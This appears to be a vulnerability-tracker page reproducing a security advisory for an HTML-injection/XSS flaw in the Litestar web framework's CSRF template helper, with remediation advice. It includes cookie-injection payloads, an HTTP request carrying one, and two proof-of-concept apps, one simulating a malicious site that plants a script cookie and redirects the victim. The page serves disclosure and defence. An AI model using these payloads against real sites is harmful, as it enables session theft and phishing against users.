Litestar CVE-2026-48060
HIGHSeverity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Overview
Litestar instances which use a template engine in conjunction with CSRF protection are vulnerable to HTML Injection which can be escalated to Cross Site Scripting due to the contents of the CSRF cookie being excluded from automatic escaping by the template engine when configured inline with documentation recommendations.
We used the latest Litestar version available via PyPI for this disclosure. At the time of writing, that is version 2.21.0 and we have not validated this against the current latest commit on the main branch.
Special Configurations Required
For a web application to be vulnerable to this issue, it must:
- Use templates to render the content which is returned to the user (e.g. Jinja, Mako, MiniJinja)
- Have CSRF protection enabled
- Have CSRF inputs enabled (i.e. a hidden form field which contains the CSRF token)
Links to relevant documentation for the above configurations:
- https://docs.litestar.dev/2/usage/templating.html
- https://docs.litestar.dev/latest/usage/middleware/builtin-middleware.html#csrf
- https://docs.litestar.dev/latest/usage/templating.html#adding-csrf-inputs
Reproduction Steps
- Visit an application which contains a form, uses templating, has CSRF protection enabled, and which inserts the CSRF token as a hidden
inputfield on forms. A proof of concept application demonstrating this configuration is included later in this disclosure for ease of reproduction. - Observe that the server sets the
csrftokencookie when the page loads.
<img width="1152" height="372" alt="litestar_csrf_cookie_in_browser_dev_tools" src="https://github.com/user-attachments/assets/252a5746-0f5f-4c78-9b9c-3ff4fb98e942" />
- Set the value of the
csrftokencookie to"><h1>HTML Injection Test</h1>.
<img width="1142" height="426" alt="litestar_csrf_cookie_poisoned_with_html" src="https://github.com/user-attachments/assets/131e5015-e718-4539-8d03-969e81a34fdc" />
- Refresh the page.
- Observe that the contents of the cookie is rendered on the page.
<img width="1152" height="480" alt="litestar_successful_html_injection" src="https://github.com/user-attachments/assets/c997f679-7111-4620-a28d-25eabea34ca2" />
Exploit Code
There are two Proof-of-Concepts (PoC) included here. The first demonstrates that arbitrary HTML is injected into the page when the user supplies a malicious csrftoken cookie. The second demonstrates how an attacker could deliver an attack using the vulnerability to an unsuspecting user.
The proof-of-concept applications can be started using these commands:
# run poc1
python -m uvicorn poc1:app
# run poc2
python -m uvicorn poc2:appPoC 1 - Minimum Vulnerable Application
This proof-of-concept demonstrates that a crafted csrftoken cookie will be rendered on the vulnerable page as HTML.
poc1.py
from litestar import Litestar, get, MediaType
from litestar.response import Template
from litestar.config.csrf import CSRFConfig
import jinja2, os
from pathlib import Path
from litestar import Litestar
from litestar.contrib.jinja import JinjaTemplateEngine
from litestar.template.config import TemplateConfig
@get("/")
async def hello_world() -> Template:
return Template(
template_name="test.jinja",
media_type=MediaType.HTML,
)
ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(
searchpath=os.path.join(os.path.dirname(__file__), "templates")
),
autoescape=True,
)
csrf_config = CSRFConfig(secret="my_super_duper_secret")
app = Litestar(
route_handlers=[hello_world],
template_config=TemplateConfig(
directory=Path("templates"),
engine=JinjaTemplateEngine.from_environment(ENVIRONMENT),
),
csrf_config=csrf_config,
)test.jinja
<html>
<body>
<div>
<form method="post">
{{ csrf_input | safe }}
<label for="fname">Username:</label><br>
<input type="text" id="username" name="username"><br>
<label for="lname">Password:</label><br>
<input type="text" id="password" name="password">
<input type="submit">
</form>
</div>
</body>
</html>Sending the following request to the vulnerable page will result in the HTML included in the csrftoken cookie being injected and rendered on the page.
GET /vulnerable HTTP/1.1
Host: localhost:8000
Cookie: csrftoken="><h1>HTML Injection Test</h1><img width="577" height="328" alt="litestar_html_injection_poc_result" src="https://github.com/user-attachments/assets/69590b08-1066-487d-ac37-62f64333de5a" />
PoC 2 - Simulated Attack Delivery
This proof-of-concept demonstrates how an attacker could deliver an attack using this vulnerability to an unsuspecting user. We are using this example as it provides for easy local reproduction, it is possible that in end applications there may be various ways to trigger this vulnerability which differ from the example provided.
First, the user must visit a malicious application (the /first_site endpoint in poc2.py) which sets the csrftoken cookie value to a malicious payload. This app must be hosted on the *same top level domain* as the vulnerable application so that the poisoned cookie will automatically be sent by the user's browser to the vulnerable page.
Next, the malicious app *redirects* the user to the vulnerable app (the /second_site endpoint in poc2.py). The victim's browser will automatically send the poisoned cookie to the vulnerable app. This causes the vulnerable application to unsafely write the cookie content to the page and return it to the user, executing the attack in the victim user's browser
poc2.py
from litestar import Litestar, get, post, MediaType
from litestar.response import Template
from litestar.config.csrf import CSRFConfig
from litestar.datastructures import Cookie
import jinja2, os
from pathlib import Path
from litestar import Litestar
from litestar.contrib.jinja import JinjaTemplateEngine
from litestar.template.config import TemplateConfig
cookie_payload = '"><script>alert(document.domain)</script>'
# malicious site which poisons the csrf cookie
@get("/first_site", response_cookies=[Cookie(key="csrftoken", value=cookie_payload, httponly=True)])
async def first_site() -> Template:
return Template(
template_name="page1.jinja",
media_type=MediaType.HTML,
)
# vulnerable site
@get("/second_site")
async def second_site() -> Template:
return Template(
template_name="page2.jinja",
media_type=MediaType.HTML,
)
# example function for form submission if csrf verification succeeds
@post("/form_receive")
async def handle_form() -> dict[str, str]:
return {
"message": "form data received successfully"
}
ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(
searchpath=os.path.join(os.path.dirname(__file__), "templates")
),
autoescape=True,
)
csrf_config = CSRFConfig(secret="my_super_duper_secret")
app = Litestar(
route_handlers=[first_site, second_site, handle_form],
template_config=TemplateConfig(
directory=Path("templates"),
engine=JinjaTemplateEngine.from_environment(ENVIRONMENT),
),
csrf_config=csrf_config,
)page1.jinja
<html>
<body>
<h1>Setting cookie...</h1>
<script>
setTimeout(() => {
window.location.href="/second_site"
}, 2000);
</script>
</body>
</html>page2.jinja
<html>
<body>
<div>
<form action="/form_receive" method="post">
{{ csrf_input | safe }}
<label for="fname">Username:</label><br>
<input type="text" id="username" name="username"><br>
<label for="lname">Password:</label><br>
<input type="text" id="password" name="password">
<input type="submit">
</form>
</div>
</body>
</html><img width="887" height="223" alt="litestar_poc_first_page_setting_cookie" src="https://github.com/user-attachments/assets/4e8f70e4-fb44-47f6-8e15-42b512cc224f" />
<img width="885" height="366" alt="litestar_poc_second_page_xss" src="https://github.com/user-attachments/assets/a8d57c66-0424-483c-ac92-4694d4e08500" />
Impact
This vulnerability affects all Litestar instances that use templates along with CSRF protection that has been configured inline with the documentation section of "Adding CSRF inputs" within the "Templating" page. An attacker that can successfully exploit this issue can inject arbitrary HTML tags into the page which is then rendered in the victim user's browser. This includes script tags, allowing the attacker to escalate the attack to a Cross Site Scripting attack, thus executing arbitrary JavaScript code in the victim's browser.
Depending on the configuration of the site, this could result in the theft of cookies or session tokens. This issue can also allow the attacker to change the appearance of the site. This could enable possible phishing attacks by injecting fake forms into the page or even skimming the information that a user enters into a legitimate form.
Resources
- https://cwe.mitre.org/data/definitions/79.html
- https://docs.litestar.dev/2/usage/templating.html
- https://docs.litestar.dev/latest/usage/middleware/builtin-middleware.html#csrf
- https://docs.litestar.dev/latest/usage/templating.html#adding-csrf-inputs
Articles & Coverage 2
AnalysisAI
Cross-Site Scripting in Litestar Python web framework versions prior to 2.22.0 allows remote attackers to execute arbitrary JavaScript in victim browsers by poisoning the csrftoken cookie, whose contents are rendered into HTML templates without escaping when the documented csrf_input helper is used. Publicly available exploit code exists via the GitHub Security Advisory GHSA-542p-wvx7-72m4, which includes two working proof-of-concept applications. The flaw only manifests in applications that combine a template engine (Jinja, Mako, MiniJinja) with CSRF protection and the recommended hidden CSRF input field pattern.
Technical ContextAI
Litestar is an ASGI Python web framework (pkg:pip/litestar) that ships a CSRF middleware and a csrf_input template helper documented for inclusion in forms as {{ csrf_input | safe }}. The | safe filter explicitly disables Jinja's autoescape for that variable, and Litestar builds the input element by concatenating the cookie value directly into raw HTML. Because the csrftoken cookie is attacker-controllable from the browser side, an attacker who can set or overwrite that cookie can break out of the value attribute and inject arbitrary markup. This is a classic CWE-79 reflected/stored XSS where the trust boundary failure is treating a client-supplied cookie as already-sanitized markup rather than untrusted input.
RemediationAI
Vendor-released patch: upgrade Litestar to 2.22.0 or later via pip (pip install --upgrade 'litestar>=2.22.0'), as published in GHSA-542p-wvx7-72m4 and the 2.22.0 changelog at https://docs.litestar.dev/2/release-notes/changelog.html#2.22.0. If an immediate upgrade is not possible, a workaround is to stop using the {{ csrf_input | safe }} helper and instead render the CSRF token by reading it from request state and emitting it through the template engine's normal autoescape (for example <input type="hidden" name="csrftoken" value="{{ csrf_token }}">), which neutralizes the injection at the cost of losing the convenience helper and requiring template changes; alternatively, disabling the CSRF input rendering entirely and relying on header-based CSRF tokens removes the sink but breaks form-based CSRF flows. Setting the csrftoken cookie as HttpOnly does not mitigate this issue because the server itself reads the cookie value and writes it into the response body.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-542p-wvx7-72m4